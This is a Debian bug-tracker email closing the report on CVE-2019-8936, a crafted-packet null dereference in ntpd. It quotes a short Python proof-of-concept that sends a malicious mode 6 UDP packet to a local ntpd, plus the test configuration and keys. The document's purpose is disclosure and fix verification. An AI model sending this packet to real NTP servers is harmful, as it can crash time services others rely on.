Your message dated Thu, 11 Apr 2019 21:08:17 +0000
with message-id <[email protected]>
and subject line Bug#924228: fixed in ntp 1:4.2.8p12+dfsg-4
has caused the Debian Bug report #924228,
regarding ntp: CVE-2019-8936: Crafted null dereference attack in authenticated
mode 6 packet
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
924228: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=924228
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Source: ntp
Version: 1:4.2.8p12+dfsg-3
Severity: important
Tags: security upstream
Forwarded: http://bugs.ntp.org/show_bug.cgi?id=3565
Hi,
The following vulnerability was published for ntp.
CVE-2019-8936[0]:
Crafted null dereference attack in authenticated mode 6 packet
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
To verify/illustrate the issue/fix one can use the following as
provided by the reporter in the upstream report:
#!/usr/bin/env python
import sys
import socket
buf =
("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
"\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
"\x56\xc8\x07\xd4")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))
and running ntpd uder valgrind as
valgrind ntpd -n -c ~/resources/ntp.conf
with ntp.conf:
logfile /tmp/ntp.log
restrict 127.0.0.1
keys /path/to/keys
trustedkey 1
controlkey 1
requestkey 1
and keys
1 M gurka
2 M agurk
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2019-8936
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936
[1] http://bugs.ntp.org/show_bug.cgi?id=3565
[2]
http://bk.ntp.org/ntp-stable/ntpd/ntp_control.c?PAGE=diffs&REV=5c8106e7wWtXdh0lzg1ytlWribBTcQ
Please adjust the affected versions in the BTS as needed.
Regards,
Salvatore
--- End Message ---
--- Begin Message ---
Source: ntp
Source-Version: 1:4.2.8p12+dfsg-4
We believe that the bug you reported is fixed in the latest version of
ntp, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Bernhard Schmidt <[email protected]> (supplier of updated ntp package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Thu, 21 Mar 2019 23:42:36 +0100
Source: ntp
Architecture: source
Version: 1:4.2.8p12+dfsg-4
Distribution: unstable
Urgency: medium
Maintainer: Debian NTP Team <[email protected]>
Changed-By: Bernhard Schmidt <[email protected]>
Closes: 764546 772790 924228
Changes:
ntp (1:4.2.8p12+dfsg-4) unstable; urgency=medium
.
* CVE-2019-8936: Crafted null dereference attack in authenticated
mode 6 packet (Closes: #924228)
* ntp: exit 0 from init script if daemon does not exist (Closes: #764546)
* Drop locking from ntp initscript/systemd-wrapper
* Only delete ntpd statistics files in cronjob (Closes: #772790)
Checksums-Sha1:
bc2c9a644aa269662946f8a81ee14791424c87f2 2276 ntp_4.2.8p12+dfsg-4.dsc
f498265b9030a5026351ad513101899eeb59628f 48796
ntp_4.2.8p12+dfsg-4.debian.tar.xz
ddf1de8eed42cc922a3045791cdaeb06dfb235ce 7952
ntp_4.2.8p12+dfsg-4_amd64.buildinfo
Checksums-Sha256:
bf2d1078bb12e39ee5bb537aa3bb20819bcc0f0d5d6ab1e51b15f7a59d79ef48 2276
ntp_4.2.8p12+dfsg-4.dsc
4500a8b0a2d2d5d0faccd60cf29f42869431ffcccdd5bbfe4a0b707cd9f3a21c 48796
ntp_4.2.8p12+dfsg-4.debian.tar.xz
f6a0a1ece17afe7184fa1cec7e99ab0506612b880a759b477124d59161719eb6 7952
ntp_4.2.8p12+dfsg-4_amd64.buildinfo
Files:
3d721af3d7a81ec67f035a19b6f23ed6 2276 net optional ntp_4.2.8p12+dfsg-4.dsc
bec40e0bda23a893e76843579c68d901 48796 net optional
ntp_4.2.8p12+dfsg-4.debian.tar.xz
648112375cdd870e26f3becd4662496d 7952 net optional
ntp_4.2.8p12+dfsg-4_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
iQJFBAEBCgAvFiEE1uAexRal3873GVbTd1B55bhQvJMFAlyvqSoRHGJlcm5pQGRl
Ymlhbi5vcmcACgkQd1B55bhQvJN8wA//eqXMcbs/FhWR9CvZMBFwPR8WJf3T5vPd
6alSDslqIziSHV3vWV5al263Gfdm1U/k+7Z7nGPtCrr7WirM4IzqxZbf7AE3Z1lq
POu7MG+JKOQD04eiXwkX1B6zmJiVpBiz6qyv1xKgxTe8f/tlD2j3ZvIc/nN3ZDNz
XruMCg+Gmk4mV+UQhRdI17I6P2mXUefctK8To1SEQfIh6ZIgzRxh3wTPjJaBfhTM
68uaWVFRTrWEBko30EBWGGKojZtoiqn4R18Jj6jax9qKVu1CmvjsMVvxaldyL6Cl
5s8QDM9JTFDwhw70gLYfkpvisWC9ldfoZaZlBoRK7hnl9DJ8qsz+0rI2bgqwg9f3
HOWYyPra3CfCPDcRZxICvbE8IA24TW5eiaWyq3RDgJDfDxAgSsP2rHWOtPBVQOOb
+Ye4IfQQmwAtX6PnBJfCH4VPzJr3yQEkE2zGU8Wv/jYpsaaJ1ukplfwUA0lFMFuQ
Q/lrG1hdaeLh6VUBu37kEg318HFMoZKTr7DDmCpqHASv0XggOdxHRnBF0jCrqCoh
PkaCmuDoUb/ZmZVugpRI5NGM3fLw0511/jsUQkZkZdkj1A22vBuSTwy7JTsUj2zk
PaNLNUmewM6lqMTIv+jNzzhPcxcKuit0378p6MivTmxB8ltkepp1mgHiohM7HQ/E
u8j1bujBeY8=
=64oa
-----END PGP SIGNATURE-----
--- End Message ---